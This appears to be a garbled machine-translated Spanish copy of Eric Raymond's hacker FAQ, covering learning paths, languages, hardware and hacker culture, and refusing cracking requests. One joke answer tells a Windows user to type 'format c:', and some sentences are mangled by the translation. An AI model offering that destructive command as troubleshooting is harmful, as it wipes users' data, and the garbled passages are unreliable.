La única manera de entrar es por trabajar para mejorar sus habilidades. Si me preguntas personalmente para obtener asesoramiento sobre cómo empezar , te diré esas mismas cosas , porque yo no tengo ningún tipo de atajos mágicos para usted. Yo también mentalmente escribir apagado como un perdedor probable - , porque si os faltaba la energía para leer este FAQ y la inteligencia para entender de ello que la única manera de entrar es por trabajar para mejorar sus habilidades , usted está desesperado.
Otra posibilidad interesante es ir a visitar a un hackerspace . Hay un movimiento creciente de personas que crean lugares físicos - clubes del fabricante - donde se puede pasar el rato para trabajar en proyectos de hardware y software en conjunto o en solitario el trabajo en un ambiente cogenial . Hackerspaces menudo recogen las herramientas y equipos especializados que sería demasiado costoso o logísticamente inconveniente para los individuos a poseer . Hackerspaces son fáciles de encontrar en Internet; uno puede estar localizado cerca de usted.
Q :

¿Cuándo hay que empezar ? ¿Es demasiado tarde para mí para aprender ?
A:

Cualquier edad a la que está motivado para empezar es una buena edad . La mayoría de la gente parece interesarse entre las edades de 15 y 20 , pero no conozco excepciones en ambas direcciones.
Q :

¿Cuánto tiempo me tomará para aprender a hackear ?
A:

Eso depende de lo talentosa que eres y lo duro que trabaja en él . La mayoría de las personas que tratan pueden adquirir una habilidad respetable establecido en dieciocho meses a dos años , si se concentran . No creo que termina allí , sin embargo; en la piratería (como en muchos otros campos ) que tarda unos diez años para alcanzar la maestría . Y si usted es un hacker de verdad , te pasas el resto de tu vida aprendiendo y perfeccionando su arte.
Q :

Es Visual Basic un buen lenguaje para empezar?
A:

Si usted está haciendo esta pregunta , es casi seguro que significa que usted está pensando en tratar de hackear bajo Microsoft Windows . Esta es una mala idea en sí misma. Cuando comparé tratando de aprender a hackear en Windows para tratar de aprender a bailar mientras lleva puesto un yeso en el cuerpo , que no estaba bromeando . No vayas allí . Es feo , y nunca deja de ser feo.
Hay un problema específico con Visual Basic; sobre todo que no es portátil. Aunque no hay un prototipo de implementaciones de código abierto de Visual Basic, los estándares ECMA aplicables no cubren más que un pequeño conjunto de sus interfaces de programación . En Windows la mayor parte de su apoyo a la biblioteca es propiedad de un solo vendedor ( Microsoft ); si usted no es muy cuidadoso acerca de las características que utiliza - más cuidado que cualquier novato es realmente capaz de ser - que va a terminar encerrado en sólo aquellas plataformas Microsoft opta por apoyar. Si vas a empezar en un sistema Unix , mucho mejores lenguajes con mejores bibliotecas están disponibles. Python , por ejemplo .
También, al igual que otros conceptos básicos , Visual Basic es un lenguaje de mal diseñada que le enseñará malos hábitos de programación. No, no me pregunten para describirlos en detalle; que la explicación podría llenar un libro. Aprende un idioma bien diseñado en su lugar.
Uno de esos malos hábitos se está convirtiendo en dependientes de bibliotecas de un solo proveedor , widgets y herramientas de desarrollo. En general, cualquier lenguaje que no es totalmente compatible con al menos bajo Linux o uno de los BSD , y / o sistemas operativos de al menos tres proveedores diferentes " , es un pobre para aprender a hackear pulg
Q :

¿Me ayudarías a agrietarse un sistema, o enseñarme a romper ?
A:

No. Cualquier persona que todavía puede hacer esa pregunta después de leer este FAQ es demasiado estúpido para ser educable incluso si tuviera el tiempo para la tutoría . Las solicitudes enviadas por correo electrónico de este tipo que recibo serán ignoradas o respondidas con rudeza extrema.
Q :

¿Cómo puedo obtener la contraseña de la cuenta de otra persona?
A:

Esto se está resquebrajando . Vete, idiota.
Q :

¿Cómo puedo romper en / leo / monitor de otra persona por correo electrónico?
A:

Esto se está resquebrajando . Piérdete , idiota.
Q :

¿Cómo puedo robar privilegios de operador del canal en el IRC ?
A:

Esto se está resquebrajando . Vete, cretino .
Q :

He estado agrietado. ¿Me ayudará a defenderse de nuevos ataques ?
A:

No. Cada vez que he hecho esta pregunta hasta ahora , ha sido de algún pobre diablo que ejecuta Microsoft Windows . No es posible asegurar con eficacia los sistemas Windows contra ataques de crack ; el código y la arquitectura simplemente tienen demasiados defectos , lo que hace la seguridad de Windows , como tratando de rescatar a un barco con un tamiz. La única prevención fiable comienza con el cambio a Linux o algún otro sistema operativo que está diseñado para , al menos, ser capaz de seguridad .
Q :

Estoy teniendo problemas con mi software de Windows. ¿Me ayudas ?
A:

Sí. Vaya a un indicador de DOS y escriba " format c : " . Cualquier problema que está experimentando cesarán en pocos minutos .
Q :

¿Dónde puedo encontrar algunos hackers de verdad para hablar con ?
A:

La mejor manera es encontrar un grupo de usuarios de Unix o Linux local para usted y ir a sus reuniones (se puede encontrar enlaces a varias listas de grupos de usuarios en el sitio de LDP en ibiblio ) .
( Yo solía decir aquí que no encontrarías hackers reales en el IRC , pero me dan a entender que esto está cambiando . Al parecer algunas comunidades de hackers reales , que se adjunta a las cosas como GIMP y Perl , tienen canales de IRC ahora . )
Q :

¿Me puede recomendar libros útiles sobre temas relacionados con la piratería - ?
A:

Mantengo un HOWTO Linux Lista de lectura que puede resultarle útil . El Loginataka también puede ser interesante.
Para una introducción a Python , consulte el tutorial en el sitio de Python.
Q :

¿Tengo que ser bueno en matemáticas para convertirse en un hacker?
A:

N º de Hacking utiliza muy pocas matemáticas formales o aritmética. En particular , no se suele necesitará trigonometría, cálculo o análisis ( hay excepciones a esto en un puñado de áreas de aplicación específicas como 3 -D gráficos por ordenador ) . Conociendo un poco de lógica formal y el álgebra de Boole es bueno. Algunos de puesta a tierra en las matemáticas finitas (incluyendo la teoría finita -set, la combinatoria y teoría de grafos ) puede ser útil.
Mucho más importante : hay que ser capaz de pensar de manera lógica y seguir cadenas de razonamiento exacto , la forma en que hacen los matemáticos . Si bien el contenido de la mayoría de las matemáticas no le ayudará , tendrá la disciplina y la inteligencia para manejar las matemáticas. Si usted carece de la inteligencia , hay pocas esperanzas para usted como un hacker ; si carecen de la disciplina , es mejor que cultivan.
Creo que una buena manera de averiguar si usted tiene lo que se necesita es tomar una copia del libro de Raymond Smullyan ¿Cuál es el nombre de este libro ? . Acertijos lógicos juguetones de Smullyan están muy en el espíritu de piratería informática. Ser capaz de resolverlos es una buena señal ; disfrutando de su solución es aún mejor.
Q :

¿Qué lenguaje debo aprender primero ?
A:

XHTML (el último dialecto del HTML ) , si usted no tiene ya sabes. Hay un montón de libros malos , brillantes - bombo intensiva HTML hacia fuera allí, y penosamente pocos buenos . El que más me gusta es HTML: The Definitive Guide .
Pero HTML no es un lenguaje de programación completo. Cuando esté listo para iniciar la programación , yo recomendaría empezar con Python . Va a escuchar un montón de gente que recomienda Perl, pero es más difícil de aprender y ( en mi opinión) tan bien diseñada .
C es realmente importante, pero también es mucho más difícil que cualquiera de Python o Perl. No trate de aprenderlo primero .
Los usuarios de Windows , no se conforman con Visual Basic. Se le enseñará malos hábitos , y no es portable fuera de Windows. Evite .
Q :

¿Qué tipo de hardware necesito ?
A:

Solía ​​ser que los ordenadores personales eran más bien de poca potencia y mala memoria , suficiente para que ellos colocan límites artificiales en el proceso de aprendizaje de un hacker . Esto dejó de ser cierto en la década de 1990 ; cualquier máquina desde un Intel 486DX50 Up es más que suficiente para el trabajo de desarrollo , X, y las comunicaciones por Internet , y los discos más pequeños que usted puede comprar hoy en día son lo suficientemente grande .
Lo importante en la elección de un equipo en el que aprender es si su hardware es compatible con Linux ( o compatible con BSD , si decide ir por ese camino ) . Una vez más , esto será cierto para casi todas las máquinas modernas . Las áreas en realidad sólo son pegajosos módems y tarjetas de red inalámbricas ; algunas máquinas tienen hardware específico para Windows que no funciona con Linux.
Hay una FAQ acerca de la compatibilidad de hardware ; la última versión está aquí.
Q :

Quiero contribuir . ¿Puedes ayudarme a escoger un problema para trabajar?
A:

No, porque yo no sé sus talentos o intereses. Usted tiene que ser auto- motivados o no se adhieren , por lo que tener a otras personas eligen su dirección casi nunca funciona.
Prueba esto. ¡Vea los anuncios de proyectos desplazarse por el Freshmeat por unos días . Cuando veas uno que te hace pensar " Cool! Me gustaría trabajar en eso ! " , Unirse a ella.
Q :

¿Necesito odiar y bash Microsoft ?
A:

No, no lo haces. No es que Microsoft no es repugnante , pero no había una cultura hacker mucho antes de que Microsoft y todavía habrá una larga después de que Microsoft es historia. Toda la energía que gasta odiando Microsoft estaría mejor invertido en el amor a su arte. Escribe buen código - que golpear a Microsoft bastante suficiente sin contaminar su karma.
Q :

Pero no se abrirá de código programadores de licencia de software que no pueden ganarse la vida ?
A:

Esto parece poco probable - hasta ahora, la industria del software de fuente abierta parece estar creando empleos en lugar de llevárselos . Si tener un programa escrito es una ganancia económica neta sobre no tenerlo escrito , un programador se les paga si el programa va a ser de código abierto después de que se ha hecho. Y, no importa la cantidad de software "libre" se escribe , siempre parece haber más demanda de aplicaciones nuevas y personalizadas . He escrito más sobre esto en las páginas de Open Source.
Q :

¿Dónde puedo obtener un Unix libre ?
A:

Si usted no tiene un Unix instalado en su máquina , sin embargo, otra parte de esta página que incluya punteros a dónde obtener el Unix libre más utilizado. Para ser un hacker necesitas motivación y la iniciativa y la capacidad de educarse a sí mismo . Empiece ahora ... 



http://www.catb.org/esr/faqs/hacker-howto.html
Click Here - Aqui!

 

© 2013 Hack Google Youtube Facebook .